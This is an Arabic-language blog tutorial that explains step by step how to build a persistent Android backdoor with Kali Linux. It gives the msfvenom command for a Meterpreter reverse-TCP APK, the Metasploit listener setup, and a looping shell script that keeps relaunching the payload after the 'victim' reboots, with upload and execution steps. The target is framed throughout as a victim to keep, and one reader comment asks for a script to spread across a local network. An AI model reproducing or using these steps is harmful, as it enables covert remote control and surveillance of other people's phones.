انشاء باك دور دائم في الاندرويد باستخدام كالي لينكس

اختراق الاندرويد كالي لينكس :-

في هذه الشرح سوف نتعرف على كيفية صنع بايلود دائم خاص بالاندرويد حيث لو قام الضحية بعمل ريستارت للجهاز سوف يعيد الاتصال بعد تشغيل الجهاز أي انك لن تفقد الضحية 


الخطوة الاولى :- 

انشاء بايلود خاص بالاندرويد باستخدام msfvenom طبعا هناك ادوات اخرة منها msfpayload التي استبدلت ب msfvenom عام 2015

 فتح تيرمنال جديد واكتب الامر الاتي  :- 

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=444 R > anything.apk

msfvenom android

بعد انشاء البايلود نقوم بعمل Listener 

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.1.3 your ip
set LPORT 444
exploit
 
payload android


 

الخطوة الثانية :-

تنفيذ سكربت دائم وذلك بنسخ السركبت الاتي الى النوت باد وحفظه بصيغة sh مهم جدا


 bin/bash/#!
: while
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done

 

 انشاء باك دور دائم في الاندرويد باستخدام كالي لينكس
 
 
يجب ان يكون السكربت كما بصوره بدون مسافات بين كل سطرجديد اذا واجهتك مشكلة عدل على الكود لكي يظهر كما بصورة




الخطوة الثالثة :-

رفع السكربت الى الضحية المخترقة الى المسار etc/init.d  ولكن لن يعمل لانه يحتاج صلاحيات ليست بمشكلة قم برفعه على المسار الاتي cd /storage/emulated/0 او على الميموري الخارجية cd /storage/extSdCard
اتبع الخطوات

cd
cd /storage/emulated/0
ls
upload aaa.sh 
 
 
يجب ان يكون ملف السكربت الذي تريد رفعه في ملف home
 
 
 
 
انشاء باك دور دائم في الاندرويد باستخدام كالي لينكس


انشاء باك دور دائم في الاندرويد باستخدام كالي لينكس
 
انشاء باك دور دائم في الاندرويد باستخدام كالي لينكس

الخطوة الرابعة :-

تنفيذ السكربت بدخول الى shell :-

/ cd
cd /storage/emulated/0
ls
 
 
shell
 
 
الان تنفيذ السكربت :-
aaa.sh

execute sh on shell
 
السكربت سوف يعمل بعد ان يقوم الضحية بعمل ريستارت
الافضل ان يتم الاختراق باستخدام public ip وتثبيت ip باسهل الطرق بدون مشاكل
 اكتب في التعليقات اذا اردتم شرحه
شارك الموضوع
تعليقات
  1. و كيف بعرف اني اختراقة ....كيف يبين الجهاز عندي اذا شغلت كالي لينكس مرة ...كيف اعرف الجهاز

    ردحذف
  2. ممكن سكربت بايثون او اي لغة برمجه يتم حقنه في الشبكه الداخليه للوصول الى جميع الاجهزه المتصله فيها والتنقل وتصفح محتوياتها

    ردحذف

إرسال تعليق